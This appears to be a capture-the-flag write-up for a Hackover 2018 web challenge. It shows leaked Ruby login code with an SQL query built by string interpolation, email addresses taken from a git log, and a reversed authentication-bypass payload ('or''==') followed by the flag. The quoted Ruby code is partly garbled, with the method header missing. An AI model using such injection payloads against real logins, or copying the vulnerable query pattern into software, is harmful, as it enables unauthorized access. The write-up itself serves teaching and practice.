Tags: sqli github

Rating: 0

**Description**

> Howdy mate! Just login and hand out the flag, aye! You can find on [h18johndoe](https://github.com/h18johndoe/user_repository/blob/master/user_repo.rb) has all you need!
>
> http://yo-know-john-dow.ctf.hackover.de:4567/login
>
> alternative: 46.101.157.142:4567/login

**No files provided**

**Solution**

We get a simple login screen, but no way to register:

First we need a username. h18johndoe from the description doesn't work. Well, we can have a look at the link from the description, which seems to show the source code for back end of this website:

ruby
class UserRepo

def initialize(database)
@database = database
@users = database[:users]
end

query = "select id, phone, email from users where email = '#{identification}' and password_digest = '#{hashed_input_password}' limit 1"
puts "SQL executing: '#{query}'"
@database[query].first if user_exists?(identification)
end

def user_exists?(identification)
!get_user_by_identification(identification).nil?
end

private

def get_user_by_identification(identification)
@users.where(phone: identification).or(email: identification).first
end

end

end


The login method has a clear SQL injection, since the password "hashing" just reverses the input we give it, without any sanitising. Before login is called however, we need to pass the user_exists? check, which seems to use prepared statements. So we still need an existing e-mail.

The file above has commits from two users, h18johndoe and john1234. GitHub doesn't seem to show e-mail addresses of users, but if we clone the repo and check the commit log, we can see the e-mails:


\$ git log
commit b26aed283d56c65845b02957a11d90bc091ac35a
Author: John Doe <angelo_muh@yahoo.org>
Date: Tue Oct 2 23:55:57 2018 +0200

commit 5383fb4179f1aec972c5f2cc956a0fee07af353a
Author: John Doe <jamez@hemail.com>
Date: Tue Oct 2 23:04:13 2018 +0200

commit 2d3e1dc0c5712efd9a0c7a13d2f0a8faaf51153c
Author: John Doe <john_doe@gmail.com>
Date: Tue Oct 2 23:02:26 2018 +0200

commit 3ec70acbf846037458c93e8d0cb79a6daac98515
Author: John Doe <john_doe@notes.h18>
Date: Tue Oct 2 23:01:30 2018 +0200

Add user repo class and file


And the last one (earliest commit chronologically) is actually the correct e-mail address: john_doe@notes.h18. After entering this e-mail we get asked for the password, and this is where we can do the SQL injection, since we don't know the user's password.

We only need to login, so we can do an extremely simple injection:

input: 'or''=='
reverse: '==''ro'
full query after injection and re-reverse:
select id, phone, email from users where email = 'john_doe@notes.h18'
and password_digest = ''or '' == '' limit 1

hackover18{I_KN0W_H4W_70_STALK_2018}